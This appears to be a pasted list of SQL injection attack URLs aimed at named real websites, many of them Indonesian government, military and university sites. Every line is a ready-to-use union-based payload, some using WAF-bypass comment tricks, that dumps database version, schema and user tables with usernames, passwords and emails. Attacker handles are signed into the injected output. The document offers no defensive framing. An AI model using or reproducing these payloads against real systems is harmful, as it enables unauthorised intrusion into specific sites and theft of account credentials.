· 8 years ago · Jul 31, 2018, 09:48 PM
1sql lokomedia
2'union select concat/**_**/((select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/ (@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x))--+--+-
3
4'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
5'/*!50000union*/ /*!50000select*/ /*!50000Concat*/(username,0x3a3a,password)+from+users--+--+
6'union+select+1,(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(users)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x)--+
7'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
8
9concat/**_**/((select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/ (@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x))
10
11
12https://jdih.cianjurkab.go.id/ViewPerbub.php?id=-396+union+select+1%2CConcat(0x3c43656e7465723e,0x6b656e746f7420627920466174757220616b61204b696e67205a657230,0x3c62723e,0x3c62723e,Version(),0x3c62723e,Database(),0x3c62723e,User(),@C:=0x3c62723e,If((Select+Count(*)+From+Information_Schema.Columns+Where+Table_Schema=Database()+And+@C:=Concat(@C,0x3c62723e,Table_Name,0x3a,0x3a,0x3a,0x3a,Column_Name)),0x3a,0x00),@C),3,4,5--+
13http://www.ukrimuniversity.ac.id/detail.php?kt=20&kn=-311%27%20/*!50000union*/%20/*!50000select*/%20null,null,null,null,null,null,null,null,/*!50000concat*/(0x222f3e3c2f696672616d653e3c63656e7465723e3c2f6469763e3c2f6469763e3c62723e3c62723e3c62723e3c62723e,0x496e6a6563746564204279202e2f4b6173616e746170,0x3c62723e,0x4461746162617365203a3a20,database(),0x3c62723e,0x5665727369203a3a20,version(),0x3c62723e,0x446972203a3a20%20,@@datadir,0x3c62723e,0x506f7274203a3a2020,@@port)--+
14https://alumni.unud.ac.id/umum.php/?id=-2334%27%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x496e6a6563746564206279205448414e4f53,0x3c62723e,0x3c62723e,0x56657273696f6e203a3a20,version(),0x3c62723e,0x4461746162617365203a3a20,database(),0x3c62723e,0x4469726563746f7279203a3a20,@@datadir,0x3c62723e,0x486f73746e616d65203a3a20,@@hostname,0x3c62723e,0x55736572203a3a20,user(),(select(@a)+from+(select(@a:=0x00),(@tbl:=0x00),(select+(@a)+from+(information_schema.columns)+where+(table_schema!=0x696e666f726d6174696f6e5f736368656d61)+and(0x00)in+(@a:=concat(@a,0x3c62723e,if(+(@tbl!=table_name),Concat(0x3c62723e,0x5461626c65203a3a20,@tbl:=table_name,0x3c62723e7e20,column_name),concat(0x7e20,(column_name)))))))a)),NULL,NULL,NULL-- -
15http://pn-ciamis.go.id/beranda.php?page=berita_selengkapnya&kd_berita=.68 /*!50000union*/ /*!50000select*/ 1,2,3,concat/**_**/('<br>','<img src="https://vignette.wikia.nocookie.net/disney/images/0/03/Miguel-dante.png" height="200" width="200">','<br>','<font color="red"> Inject By Baim','</font>','<br>','<font color="red"> Version :: ',version/**_**/(),'</font>','<br>','<font color="red"> Database :: ',database/**_**/(),'</font>','<br>','<font color="red"> Port :: ',@@port,'</font>','<br>','</font>','<br>','<font color="red"> Hostname :: ',@@hostname,'</font>','<br>',(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/ (@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)),5,6,7--+
16http://disperikanan.gresikkab.go.id/beritadetail.php?ID=22 and x(point(0,0)) /*!50000union*/ select 1,2,Concat('Injected by Fansa<br>',user/**x**/(),0x202f20,database/**x**/(),0x202f20,@@version),4,5,6,7-- -
17https://www.yarsi.ac.id/alumni/news.php?id=11%27 and .0Union-- -%0A%53elect 1,2,3,4,'Injected by Fansa',@@version,7,8,9,10,11,12,13,14,16,16,17,18,19,20,21,22,23,24,25,26,27,28,29,20,31,32,33,34--+
18https://www.dairikab.go.id/berita.php?id=195+and+1=0+union+all+select+1,concat%28version%28%29,0x3a,user%28%29,0x3a,database%28%29%29,3,4,5,6,7--
19http://www.borobudur.ac.id/sikad/detailnews.php?no=16%27+union+select+1%2C2%2Cmake_set%286%2C%40%3A%3D0x0a%2C%28%2F%2A%2150000select%2A%2F%281%29from%28%2F%2A%2150000information_schema.columns%2A%2F%29where%40%3A%3Dmake_set%28511%2C%40%2C0x3c6c693e%2C%2F%2A%2150000table_name%2A%2F%2C%2F%2A%2150000column_name%2A%2F%29%29%2C%40%29%2C4%2C5%2C6%2C7--+
20http://ditkuad.mil.id/4b583376b2767b923c3e1da60d10de59.php?infolahtaditkuad=detailartikel&id_artikel=-29%27%20/*!50000union*//**//*!50000select*/%201,2,3,4,5,6,7,8--+
21https://pusdikarhanud.mil.id/index.php?artikel=-346%27%20union%20select%201,2,3,4,5,6,7,8,9,10--+
22http://greencampus.uns.ac.id/pkkmb2016/artikel/artikel.php?nim=-B0416027%27+union+select+1,2,3,4,5,group_concat(id_user,0x3a,username,0x3a,password,0x3a,role),7,8,9,10,11,12,13,14,15,16,17+from+admin--+
23http://rsudkarawang.id/layanan.php?i=13%27%20union%20select%201,2,3,4,5,6,7,8,9--+
24http://www.indah-wisata.com/main.php?apps=news&id=-27+union+select+1%2C2%2C%40%40version%2C4%2C5--
25http://www.jdih.lampungprov.go.id/html/guru.php?id=materi2&kode=1871%27+union+select+1,2,3,4--+
26http://herbarium.krbogor.lipi.go.id/home.php?module=detailberita&id=-37%27+union+select+1,2,concat(0x3c666f6e7420666163653d27636f7572696572206e65772720636f6c6f723d27677265656e273e,0x496e6a6563746564206279204c435239393958,0x3c62723e,0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,user(),0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),4,5,6,7,8,9--+
27http://simiko.sumbarprov.go.id/bagan/struktur_organisasi.php?id=-972%27+union+select+1,group_concat(user,0x3a,pass),3,4,5,6+from+tbl_user--+
28http://rudenimdenpasar.imigrasi.go.id/?mod=home&id=-157%27+union+select+1,group_concat(user_name,0x3a,user_pass),3,4,5,6,7,8,9,10+from+tb_user--+
29http://pn-pekanbaru.go.id/beritadetil.php?module=beritadetil&id=-214%27+union+select+1,2,3,concat(0x2E3A3A5B2820496E6A6563746564206279204D722E3472374875313220295D3A3A2E,%22%3Cbr%3E%22,version(),%22%3Cbr%3E%22,concat(email,%22%3Cbr%3E%22,username,%22%3Cbr%3E%22,password,%22%3Cb%3E%22)),5,6,7,8,9,10,11,12,13+from+users--+
30https://fkip.unsika.ac.id/detail_berita.php?idber=-160%27+union+select+1,2,concat(0x3c666f6e7420666163653d27636f7572696572206e65772720636f6c6f723d27677265656e273e,0x496e6a6563746564206279204c435239393958,0x3c62723e,0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,user(),0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),4,5,6,7,8,9,10--+
31http://beacukai-kediri.com/artikel.php?judul=-Gowes+Bareng+Custom+Cycling+Club+dan+Senam+Bersama+Disbudparpora%27+union+select+1%2C2%2Cgroup_concat%28id%2C0x3a%2Cusername%2C0x3a%2Cemail%2C0x3a%2Cpassword%2C0x3a%2Csalt%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14+from+members--+
32https://www.krcibodas.lipi.go.id/artikel_detail.php?id=-216%27+union+select+1,2,group_concat(name,0x3a,user,0x3a,password,0x3a,email),4,5,6,7,8,9,10,11,12+from+t_user--+
33http://simiko.sumbarprov.go.id/home.php?page=detail_berita&id=-47%27+union+select+1,2,3,concat(0x3c666f6e7420666163653d27636f7572696572206e65772720636f6c6f723d27677265656e273e,0x496e6a6563746564206279204c435239393958,0x3c62723e,0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,user(),0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),5,6--+
34http://p3epapua.menlhk.go.id/berita_lengkap.php?id=-23%27+union+select+1,2,concat(0x3c666f6e7420666163653d27636f7572696572206e65772720636f6c6f723d27677265656e273e,0x496e6a6563746564206279204c435239393958,0x3c62723e,0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,user(),0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),4,5,6--+
35http://sdn2mbhulu.com/readmore--47'/*!50000union*/+/*!50000select*/+1,2,3,4,5,6--+.html
36http://kopi-ijen.com/user/ui.php?page=babe&id=NEWS-.1709050004%27/*!union*/+/*!select*/+1,2,3,4,5,6--+
37http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=-9%27+union+select+1,2,3,4,5,6,group_concat(username,0x3a,password)+from+t_user--+
38http://www.pn-jakartabarat.go.id/beritadetil.php?module=beritadetil&id=-203%27+union+select+1,2,3,concat(0x3c666f6e7420666163653d27636f7572696572206e65772720636f6c6f723d27677265656e273e,0x496e6a6563746564206279204c435239393958,0x3c62723e,0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,user(),0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),5,6,7,8,9,10,11,12,13--+
39https://www.batangkab.go.id/?p=11&id=-1%27%20/*!50000union*//**//*!50000select*/%201,2,3,4,5,6--+
40http://siposter.bkpsdmwajo.id/media.php?module=detailinformasi&id=-143%27+union+select+1,group_concat(username,0x3a,password,0x3a,level),3,4,5,7,8,9,10+from+dk_admin--+
41https://unhas.ac.id/fekon/ppked/?page=Beranda%27+union+select+1,1,(select+concat(0x53714c69,mid((select+concat(group_concat(0x04,n,0x05,0,0x04+order+by+n+separator+0x06),0x01030307)from(select+cast(COLUMN_NAME+as+char)n+from+information_schema.columns+where+TABLE_SCHEMA=0x70706b6564+and+TABLE_NAME=0x7573657273+order+by+n+limit+0,65536)x),1,69628))),1--+
42http://utama.tegalkab.go.id/artikel.php?id=-113%27+union+select+1,group_concat(admin_username,0x3a,admin_password),3,4,5,6,7,8+from+admin--+
43https://app2.pertanian.go.id/simluh2014/viewreport/shkecbp3k.php?kode_prop=-3200%27+union+select+1,2,concat(table_name),4+from+information_schema.tables+where+table_schema=database()--+
44http://bkdd.minutkab.go.id/halaman.php?id=-26%27+union+select+1,2,group_concat(username,0x3a,password),4,5,6+from+user--+
45http://merapi.bgl.esdm.go.id/pub/page.php?idf=-9+union%20select%201,2--
46http://siwak.kemenag.go.id/t_wakaf.php?id=-145389%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,121,31,41,51,6,17,18,19,20,21,22,23,24--+
47http://bpad.jogjaprov.go.id/siks/integrasi/service.php?type=detail&id=1136%20union%20select+1,2,3,4,5,6,7,8,9,10,11--
48http://jurnal.umc.ac.id/dosen.php?detail=dosen&id=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
49http://www.rsudkajen.id/artikel.php?id=-1%27+union+select+1,2,3,4,5,6,7,8--+-
50http://se.unikom.ac.id/artikel.php?id=-1+union+select+1,2,3,4,5--+&tipe=detail
51http://bbkk.kemenperin.go.id/page/bacaartikel.php?id=.5+UNION+ALL+SELECT+1%2Cfile_priv%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11+from+mysql.user+--+
52http://rsud.klungkungkab.go.id/?view=informasi-detail&menu=berita&idpost=-POS-028%27+/*!12345union*/+/*!12345select*/+1,2,3,4,/*!12345concat*/(username,0x3a,password,0x3a,otoritas),6,7,8,9,10,11+from+tb_user--+
53http://portal.semarangkab.go.id:2800/jdih2018/lihat_berita.php?id_berita=-5%27+union+select+1,group_concat(column_name),3,4,5,6++from+information_schema.columns+where+table_name=CHAR(%20117,%20115,%20101,%20114%20)--+
54http://pn-tais.go.id/post.php?id=-59%27+union+select+1,2,concat(username,0x3a3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,27,18,19,20,21,22,23,24,25,26,27,28,29,30+from+pntai544_users--+
55http://jdihukum.pandeglangkab.go.id/profil/?tipe=-2%27union+select+1,concat(uname,0x3a3a,upass),3+from+tbauth--+
56https://polrestanahdatar.id/beritalengkap.php?id=63%27+union+all+select+1,2,3,4,5,6,7,8,9--+
57https://www.mentawaikab.go.id/readmore.php?q=-15%27%20/*!00000Union*/%20/*!00000Select*/+1,2,3,4,5,6,7,8,9--+-
58http://disnakertrans.jatengprov.go.id/index.php/berita/lihat/?id=27'UNION SELECT 1,2,Concat(0x3c63656e7465723e3c696d67207372633d2768747470733a2f2f692e696d6775722e636f6d2f6a544e69514d722e6a706727206865696768743d27323025272077696474683d313025273e,0x3c62723e,0x496e6a6563742062792045784c696e6565,0x3c62723e,0x3c62723e,0x75736572203e3e3e20,user/**x**/(),0x3c62723e,0x6461746162617365203e3e3e20,database/**x**/(),0x3c62723e,0x76657273696f6e203e3e3e20,@@version,0x3c62723e,0x686f73746e616d65203e3e3e20,@@hostname,0x3c62723e,0x706f7274203e3e3e20,@@port,0x3c62723e,0x62617365646972203e3e3e20,@@basedir,0x3c62723e,0x64617461646972203e3e3e20,@@datadir,0x3c62723e,0x55554944203e3e3e20,UUID(),0x3c62723e),4,5,6,7,8,9,10,11--+
59
60https://www.chennaihalls.in/payment.php?id=375%20union%20select%201,2,(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@))),4,5,6,7,8--
61
62Query : http://www.stoneystraps.com/products-details.php?id=-35%27 Union Select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,"Fansa~",19,sqlite_version(),21,22,23,24,25,26,27,28,29 from sqlite_master-- -
63Query : https://www.yarsi.ac.id/alumni/news.php?id=11%27 and .0Union-- -%0A%53elect 1,2,3,4,'Injected by Fansa',@@version,7,8,9,10,11,12,13,14,16,16,17,18,19,20,21,22,23,24,25,26,27,28,29,20,31,32,33,34--+
64Query : http://disperikanan.gresikkab.go.id/beritadetail.php?ID=22 and x(point(0,0)) /*!50000union*/ select 1,2,Concat('Injected by Fansa<br>',user/**x**/(),0x202f20,database/**x**/(),0x202f20,@@version),4,5,6,7-- -
65Solution : and x(point(0,0)) -- -
66+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])
67 and (select 1)=(Select 0xA*1000)
68 and mod(9,4)
69
70http://pn-ciamis.go.id/beranda.php?page=berita_selengkapnya&kd_berita=.68 /*!50000union*/ /*!50000select*/ 1,2,3,concat/**_**/('<br>','<img src="https://vignette.wikia.nocookie.net/disney/images/0/03/Miguel-dante.png" height="200" width="200">','<br>','<font color="red"> Inject By Baim','</font>','<br>','<font color="red"> Version :: ',version/**_**/(),'</font>','<br>','<font color="red"> Database :: ',database/**_**/(),'</font>','<br>','<font color="red"> Port :: ',@@port,'</font>','<br>','</font>','<br>','<font color="red"> Hostname :: ',@@hostname,'</font>','<br>',(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/ (@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)),5,6,7--+
71
72http://www.zixem.altervista.org/SQLi/lvl8.php?id=-1%0bunion%0bselSELECTect%0bconcat(0x4b686174756c697374697761203a3a3a20,version()),2,3%23
73https://www.gallery7.com/prod-details.php?code=713+and+false+union+select+1%2C2%2C3%2C4%2Cconcat%280x3c696d67207372633d2268747470733a2f2f65646d6c692e636f6d2f77702d636f6e74656e742f75706c6f6164732f323031382f30342f363230783331302e6a7067222f3e20%2C0x496e6a6563746564206279206d33333769676874%2C0x3c62723e4d7953514c2056657273696f6e203a3a20%2Cversion%28%29%2C0x3c62723e43757272656e742055736572203a3a20%2Cuser%28%29%2C0x3c62723e506f7274203a20%2C%40%40port%2C0x3c62723e56657273696f6e203a20%2C%40%40version_compile_machine%2C0x3c62723e4f73203a20%2C%40%40version_compile_os%2C0x3c62723e4469726563746f7279203a20%2C%40%40datadir%2C0x3c62723e546d70203a20%2C%40%40tmpdir%2C0x3c62723e53796d6c696e6b203a20%2C%40%40GLOBAL.have_symlink%2C0x3c62723e53534c203a20%2C%40%40GLOBAL.have_ssl%29%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36--+
74My query : https://alumni.unud.ac.id/umum.php/?id=-2334%27%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x496e6a6563746564206279205448414e4f53,0x3c62723e,0x3c62723e,0x56657273696f6e203a3a20,version(),0x3c62723e,0x4461746162617365203a3a20,database(),0x3c62723e,0x4469726563746f7279203a3a20,@@datadir,0x3c62723e,0x486f73746e616d65203a3a20,@@hostname,0x3c62723e,0x55736572203a3a20,user(),(select(@a)+from+(select(@a:=0x00),(@tbl:=0x00),(select+(@a)+from+(information_schema.columns)+where+(table_schema!=0x696e666f726d6174696f6e5f736368656d61)+and(0x00)in+(@a:=concat(@a,0x3c62723e,if(+(@tbl!=table_name),Concat(0x3c62723e,0x5461626c65203a3a20,@tbl:=table_name,0x3c62723e7e20,column_name),concat(0x7e20,(column_name)))))))a)),NULL,NULL,NULL-- -
75
76Erik Hutabarat : https://alumni.unud.ac.id/agenda.php?id=.48+union+select+1111%2C2222%2C3333%2C4444%2C5555%2C6666%2C0x496e6a65637433642042792048616e64736f6d6577617265%2Cgroup_concat%28user%28%29%2Cversion%28%29%2Cdatabase%28%29%2C%28select%28select+concat%28%40%3A%3D0xa7%2C%28select+count%28%2A%29from%28information_schema.columns%29where%28%40%3A%3Dconcat%28%40%2C0x3c6c693e%2Ctable_name%2C0x3a%2Ccolumn_name%29%29%29%2C%40%29%29%29%29--+-
77
78
79Aknanta : https://alumni.unud.ac.id/umum.php?id=-1%27+union+select+1111%2C2222%2C%2F%2A%2150000Concat%2A%2F%280x3c63656e7465723e3c666f6e74207374796c653d22636f6c6f723a677265656e3b746578742d736861646f773a307078203170782035707820233030303b666f6e742d73697a653a33307078223e496e6a65637465642062792053616e613c2f666f6e743e3c62723e3c696d672077696474683d22323430707822206865696768743d22323430707822207372633d2268747470733a2f2f7062732e7477696d672e636f6d2f6d656469612f4444463572306d55514145456951492e6a7067223e%2C0x3c62723e%2C0x55534552202d3e+%2CUSER%28%29%2C0x3c62723e%2C0x4441544142415345202d3e+%2CDATABASE%28%29%2C0x3c62723e%2C0x56455253494f4e202d3e%2CVERSION%28%29%2C0x3c62723e%2C0x486f73746e616d65202d3e%2C%40%40HOSTNAME%2C0x3c62723e%2C0x506f7274202d3e%2C%40%40PORT%2C0x3c62723e%2C%28select%28%40x%29from%28select%28%40x%3A%3D0x00%29%2C%28select%280%29from%28information_schema.columns%29where%28table_schema%3Ddatabase%28%29%29and%280x00%29in%28%40x%3A%3Dconcat+%28%40x%2C0x3c62723e%2Ctable_name%2C0x203a3a20%2Ccolumn_name%29%29%29%29x%29%29%2C4444%2C5555--+-
80
81http://metrogroup.co.id/~pdwarchi/news.php?id=26%27%20=75%20=75%20Union%20Select%201,2,3,Concat(%22Your_Name~%3Cbr%3E%22,(select%20variable_value%20from%20information_schema.session_variables%20where%20variable_name%20like%200x76657273696f6e)),5,6,7,8,9,10,11,12,13--%20-
82
83Prostakov molchalin : https://alumni.unud.ac.id/umum.php?id=-3%27+union+select+1111%2CGrOup_ConCat%280x3c63656e7465723e%2C0x0a0a0a3c696d67207372633d2268747470733a2f2f656e637279707465642d74626e302e677374617469632e636f6d2f696d616765733f713d74626e3a414e64394763524d546c2d4c595953686e474c4934423165656c6a335f5476714c5666533437455f54496d79543141574c577354544865522d7722206865696768743d22313530222077696474683d22313530223e%2C0x3c63656e7465723e%2C0x496e6a65637465642062792062335f7730726b%2C0x3c62723e%2C0x4461746162617365203a3a3a20%2Cdatabase%28%29%2C0x3c62723e%2C0x55736572203a3a3a20%2Cuser%28%29%2C0x3c62723e%2C0x56657273696f6e203a3a3a20%2Cversion%28%29%2C0x3c62723e%2C0x486f73746e616d65203a3a3a20%2C%40%40hostname%2C0x3c62723e%2C0x44617461204469726563746f7279203a3a3a20%2C%40%40datadir%2C0x3c62723e%2C0x506f7274203a3a3a20%2C%40%40port%2C0x3c62723e%2C0x3c62723e%2C%2F%2A%2112345make_set%2A%2F%286%2C%40%3A%3D0x0a%2C%28select%281%29%2F%2A%2112345from%2A%2F%28%2F%2A%2112345information_schema.columns%2A%2F%29where%40%3A%3Dmake_set%28511%2C%40%2C0x3c6c693e%2C%2F%2A%2112345table_name%2A%2F%2C%2F%2A%2112345column_name%2A%2F%29%29%2C%40%29%29%2C3333%2C4444%2C5555--+-
84QUERY : https://indiansuperstore.in/product_detail.php?id=-1986+UNION+SELECT+1,concat('<img src="https://img00.deviantart.net/c2db/i/2017/273/8/5/toga_himiko_by_fitz2013-dbp1khp.png" height="300" </img>','<br>','INJECTED BY RESIS-07','<br>',user(),'<br>',@@version,'<br>',@@hostname,'<br>',database()),3,4,5,6,7,8,9,10,11,12,13,14,15--+
85 My Query :
86
87http://www.nisshinkyo.org/search/college.php?id=.156 +UNION+ALL+SELECT+1,concat(0x496e6a65637420427920596f757273656c66,"<br>",version(),"<br>",user(),"<br>",database(),"<br>",@@hostname,"<br>",@@datadir),(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174+--+
88
89Udje :
90
91http://www.nisshinkyo.org/search/college.php?id=-156%20union%20select%201,group_concat(0x3c696d67207372633d2768747470733a2f2f696d6167652e6962622e636f2f6e78526d75792f69636f6e312e706e6727206865696768743d27313025272077696474683d313025273e,0x3c62723e3c666f6e7420636f6c6f723d233133304534363e3c623e2e3a3a20496e6a6563746564206279204d722e34723748753132203a3a2e3c2f623e,0x3c62723e56455253494f4e203a3a20,version(),0x3c62723e4441544142415345203a3a20,database(),0x3c62723e484f5354203a3a20,@@Hostname,0x3c62723e,(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3c62723e,table_name,0x3a,column_name))))a)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174--+-
92
93Arif :
94http://www.nisshinkyo.org/search/college.php?id=-156+union+select+%201,Concat(0x3c63656e7465723e,0x3c696d67207372633d2268747470733a2f2f656e637279707465642d74626e302e677374617469632e636f6d2f696d616765733f713d74626e3a414e64394763524d546c2d4c595953686e474c4934423165656c6a335f5476714c5666533437455f54496d79543141574c577354544865522d7722206865696768743d22323730222077696474683d22323530223e,0x496e6a65637465642062792062335f7730726b,0x3c62723e,0x3c62723e,database(),0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,@@datadir,0x3c62723e,@@hostname,0x3c62723e,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174--+-
95
96Query w : http://www.microtek.com/products.php?KindID=6&ID=1 and x(point(0,0)) UNION SELECT 1,2,3,4,5,6,7,concat('Injected by Fansa<br>',user(),'<br>',@@version,'<br>',database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70-- -
97
98Nikolas : http://www.microtek.com/products.php?KindID=6&ID=1 and x(point(0,0)) union select 1,2,3,4,5,6,7,Concat('Injected By Hostketeer','<br>','Version :: ',version(),'<br>','Database :: ',database(),'<br>','User :: ',user(),'<br>',(select(@x)from(select(@x:=0x00),(select(0)From(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=CoNCaT(@x,'<br>',table_name,'::',column_name))))x)),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70-- -
99
100Bayu : http://www.microtek.com/products.php?KindID=6&ID=1+limit+2%2C1+UNION+SELECT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36%2C37%2C38%2C39%2C40%2C41%2C42%2C43%2C44%2C45%2C46%2C47%2C48%2C49%2C50%2C51%2C52%2C53%2C54%2C55%2C56%2C57%2C58%2C59%2C60%2C61%2C62%2C63%2C64%2C65%2C66%2Cconcat(%27</title>%27,0x496e6a6563746564206279204b686174756c697374697761,0x3c62723e,0x56657273696f6e203a3a3a20,version(),0x3c62723e,0x55736572203a3a3a20,user(),0x3c62723e,0x4461746162617365203a3a3a20,database(),0x3c62723e,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)),68,69,70--+
101
102Diwan : http://www.microtek.com/products.php?KindID=6&ID=1+And x(point(9,9))+UNION+SELECT 1,2,3,4,5,6,concat(0x496e6a6563746564206279202e2f57616e7a5f4944,'</br>',user(),'</br>',database(),'</br>',version()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70--
103
104Rio : http://www.microtek.com/products.php?KindID=6&ID=1 and x(point(0,0)) union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,Concat('</title>','Injected By RHawkz404','<br>','Version :: ',version(),'<br>','Database :: ',database(),'<br>','User :: ',user(),'<br>',(SELECT GROUP_CONCAT(table_name,0x203a3a20,column_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=DATABASE())),68,69,70--
105
